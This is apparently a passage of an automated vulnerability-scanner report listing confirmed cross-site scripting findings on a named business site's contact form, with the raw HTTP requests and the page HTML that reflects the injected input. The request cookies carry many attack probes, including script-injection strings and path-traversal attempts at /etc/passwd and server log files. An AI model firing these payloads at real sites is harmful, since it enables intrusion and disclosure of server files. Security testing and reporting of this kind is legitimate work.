>San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000BF9)</script>" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" formError" /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <t..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST '"--></style></script><script>alert(0x000C1B)</script>
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C1B)%3c%2fscript%3e&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:35 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=A47EAEBF4799404E1E4B7B95728C0353; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="'"--></style></script><script>netsparker(0x000C1B)</script>"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST '"--></style></script><script>alert(0x000C57)</script>
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 